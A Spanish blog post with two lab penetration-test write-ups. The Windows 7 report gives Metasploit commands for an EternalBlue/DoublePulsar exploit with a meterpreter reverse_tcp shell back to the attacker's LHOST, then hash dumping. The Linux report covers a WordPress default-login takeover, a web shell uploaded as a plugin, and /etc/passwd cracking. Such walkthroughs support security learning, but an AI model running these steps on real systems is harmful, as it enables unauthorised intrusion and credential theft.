Vistas de página en total

miércoles, 11 de abril de 2018

VULNERAR UN EQUIPO EN WINDOWS




1.   Objetivo y Alcance:
 


El objetivo de este análisis de seguridad es conocer el estado de seguridad del host  y mostrar un reporte de cada uno de los agujeros de seguridad que vaya encontrando.

WINDOWS                              ip: 192.168.153.143
 




Cabe destacar la importancia de un proceso de pentesting.  Como son:






2.      SUMARIO EJECUTIVO:
 

Se ha dispuesto a realizar una auditoría de seguridad sobre el equipo: WINDOWS, así como fallos potenciales que podría tener la misma.
Existen innumerables quiebras de seguridad en relación a la infraestructura y aplicación web que podrían afectar a la integridad, privacidad, confidencialidad o disponibilidad de los datos, así como del acceso al servidor.
Se han detectado diferentes vulnerabilidades clasificadas por el nivel de las mismas, es decir, hay vulnerabilidades que requieren una atención mayor puesto que presentan una quiebra de manera crítica en este dominio que otras que muestran un nivel básico en lo que al riesgo se refiere.
Existen algunas otras vulnerabilidades de nivel bajo que no suponen a día de hoy realmente un riesgo real para la aplicación, aunque se recomienda solucionarlas ya que en un futuro su nivel de riesgo podría aumentar debido a la combinación de estas con otras posibles vulnerabilidades de más nivel.


















3.      Detalle de resultados técnicos.
 


Después del proceso de recolección de información llevado a cabo por nmap o por nessus entre otras herramientas, cabe destacar el hecho de que hay varias formas de vulnerar una máquina. Por medio de la utilización de exploits de forma remota, yo he utilizado armitage por ejemplo, pero hay otras herramientas, mediante de los llamados ataques del lado del cliente que para este caso no ha sido posible y el ultimo por del uso de credenciales o Pass the Hash.


4.      VULNERABILIDADES:
 

Para este proceso se muestra el uso de la herramienta nmap:


Se observa mediante el uso de nmap se observa que se trata de un Windows 7 y por esto se hace referencia un exploit que tuvo bastante repercusión como es EthernalBlue. Es un exploit supuestamente desarrollado por la NSA. Fue filtrado por el grupo de hackers "Shadow Brokers" el 14 de abril de 2017, y fue utilizado en el ataque mundial de ransomware con WannaCry del 12 de mayo de 2017.
EternalBlue aprovecha una vulnerabilidad en la implementación del protocolo Server Message Block (SMB) de Microsoft. Esta vulnerabilidad, denotada como CVE-2017-0144 en el catálogo Common Vulnerabilities and Exposures (CVE), se debe a que la versión 1 del servidor SMB (SMBv1) acepta en varias versiones de Microsoft Windows paquetes específicos de atacantes remotos, permitiéndoles ejecutar código en el ordenador en cuestión.





Básicamente tienes una herramienta llamada Eternalblue que lo agregamos a metasploit para ejecutarla, funciona con Windows 7 o Windows Server 2008 para obtener una shell.
Ahora el método funciona con un Windows 64bits y un Kali Linux 64bits con un soporte o arquitectura de 32bits para wine.
sudo dpkg --add-architecture i386
apt-get install wine32
Tienes que desactivar los firewall, cuando lo tengas activado el exploit se va a reventar y no ejecutar.
Recuerda a Windows 7 64bits SP1, no necesitas instalar algo.

git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
Ahora descargamos la herramienta, observaron la URL, algunas personas me entenderán porque no quería bajarlo.

Ahora vamos a jugar.

cd Eternalblue-Doublepulsar-Metasploit
cp eternalblue_doublepulsar.rb /usr/share/metasploit-framework/modules/exploits/windows/smb/
Lo que hicimos fue agregar el modulo a metasploit

service postgresql start


use exploit/windows/smb/eternalblue_doublepulsar
show options
set DOUBLEPULSARPATH /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps
set ETERNALBLUEPATH /root/Desktop/Eternalblue-Doublepulsar-Metasploit/deps
set PROCESSINJECT lsass.exe
lsass.exe es solo para windows de 64bits

set RHOST 192.168.153.143
Recuerda RHOST es la IP de tu víctima


set TARGETARCHITECTURE x64
set target 8
Agregamos target para windows 7

set PAYLOAD windows/x64/meterpreter/reverse_tcp
El PAYLOAD tiene que ser exclusivo para 64bits

set LHOST 192.168.1.5
Recuerda IP de tu maquina
Ahora ejecutar el exploit.
Mediante el comando de getsystem vemos que somos Admin, es decir somos root
Hay varios parámetros como por ejemplo hashdump para coger los hashes de las cuentas de usuarios que hay para poder descifrarlos posteriormente.
Al crear la Shell vemos que pertenecemos a la carpeta de System32, tenemos privilegios.
Podríamos hacer lo que queramos, la maquina estaría vulnerada



5.      CONCLUSION:
 


Como conclusión cabe destacar la importancia de configurar de actualizar nuestro Windows con el fin de no facilitar a un atacante el uso de diferentes exploits que puedan mostrar el control total de nuestro equipo























VULNERAR A UN HOST EN LINUX




1.   Objetivo y Alcance:
 


El objetivo de este análisis de seguridad es conocer el estado de seguridad del host  y mostrar un reporte de cada uno de los agujeros de seguridad que vaya encontrando.

LINUX                                         ip: 192.168.46.128
 




Cabe destacar la importancia de un proceso de pentesting.  Como son:









2.      SUMARIO EJECUTIVO:
 

Se ha dispuesto a realizar una auditoría de seguridad sobre el equipo: LINUX, así como fallos potenciales que podría tener la misma.
Existen innumerables quiebras de seguridad en relación a la infraestructura y aplicación web que podrían afectar a la integridad, privacidad, confidencialidad o disponibilidad de los datos, así como del acceso al servidor.
Se han detectado diferentes vulnerabilidades clasificadas por el nivel de las mismas, es decir, hay vulnerabilidades que requieren una atención mayor puesto que presentan una quiebra de manera crítica en este dominio que otras que muestran un nivel básico en lo que al riesgo se refiere.
Se han detectado concretamente, 55 vulnerabilidades, de ellas solo una de nivel alto que podría provocar que un atacante realizara diversos ataques y pudiera vulnerar el sistema. Cada uno de estos ataques los veremos en los siguientes procesos.
Existen vulnerabilidades por un nivel inferior, Medium, las cuales he encontrado.
Un nivel por debajo se encuentran las llamadas vulnerabilidades Low. Habrá que analizarlas puesto que pueden ser falsos positivos.
Existen algunas otras vulnerabilidades de nivel bajo que no suponen a día de hoy realmente un riesgo real para la aplicación, aunque se recomienda solucionarlas ya que en un futuro su nivel de riesgo podría aumentar debido a la combinación de estas con otras posibles vulnerabilidades de más nivel.

  


3.      Detalle de resultados técnicos.
 



Después del proceso de recolección de información llevado a cabo por nmap o por nessus entre otras herramientas, cabe destacar el hecho de que hay varias formas de vulnerar una máquina. Por medio de la utilización de exploits de forma remota, yo he utilizado armitage por ejemplo, pero hay otras herramientas, mediante de los llamados ataques del lado del cliente que para este caso no ha sido posible y el ultimo por del uso de credenciales o Pass the Hash.










4.      VULNERABILIDADES:
 
Para esta máquina, la ip estaba establecida de manera estática por lo tanto he hecho un escaneo para ver los servicios de los puertos abiertos . Cabe decir que el parámetro –sV es para hacer un escaneo con detalle para ver la versión de los servicios abiertos


Se observan varios puertos abiertos e iremos probando cada uno de ellos de las diferentes formas que hemos visto con anterioridad.


He visto que se hace incisión a una vulnerabilidad critica basado en el sistema de detección de la versión del sistema operativo de unix.

La solución para esto es actualizar la versión de Unix
Como ya tenemos toda esta información voy a presentar las diferentes técnicas que he realizado:
Mediante Armitage , he intentado explotar las vulnerabilidades de forma remota pero no tenía mucha fe puesto que su base de datos está bastante desactualizada y no contiene todos los exploits con los que se cuentan hoy en día.



Como me esperaba o no era explotable ciertos exploits o armitage no soportaba para ese chekeo de exploits.

Comienzo a hacer lo que se conoce como una explotación manual.
Como tenía el puerto 80 abierto, he intentado acceder a la página y ver el archivo robots.txt
Robots.txt es un archivo de texto con extensión .txt, que creamos y subimos a nuestro sitio Web y que utilizamos para impedir que los robots de ciertos buscadores rastreen contenido que no deseamos que indexen ni muestren en sus resultados.

Como vemos nos permite que vayamos al directorio de wordpress y eso he hecho.
Si se mira el código fuente de la página se observa una función de javascript en el que redirecicona a una url y he accedido

He tenido éxito en el login como:
  • ·       User: admin
  • ·       Pass: admin

Pero cabe recalcar que, si no se ha tenido éxito, se podría hacer un acceso mediante Fuerza Bruta como puede ser el caso de hydra o de crunch por ejemplo.
Si conseguimos acceder al panel de administrador de Wordpress como es este caso, el siguiente paso será el objetivo de subir una Shell.
Para ello accedemos a la sección de plugins y la idea es subir un pulgin pero el código que tendrá este será el de una Shell, asi cuando subamos el archivo, activemos este ¨plugin¨ y accedamos a la URL del mismo, se establecera una Shell del mismo donde podemos acceder al host de la victima de forma remota.

Cuando subamos este plugin y si se ha realizado con éxito lo único que nos quedara será acceder a esa URL y estaremos dentro del equipo.




Se observa que en esta Shell se podría inyectar código Sql , parámetros por consola , información de la red , nos podemos mover entre directorios, etc.


Si accedemos a la raíz /etc/passwd . Se podrá observar cada una de las cuentas que podemos descifrar mediante herramientas como ophcrack, basado en diccionarios.

Intente cambiar los permisos a 777 para ser root pero no me dejo.

5.      CONCLUSION:
 


Como conclusión cabe destacar la importancia de configurar el archivo robots.txt de la mejor manera posible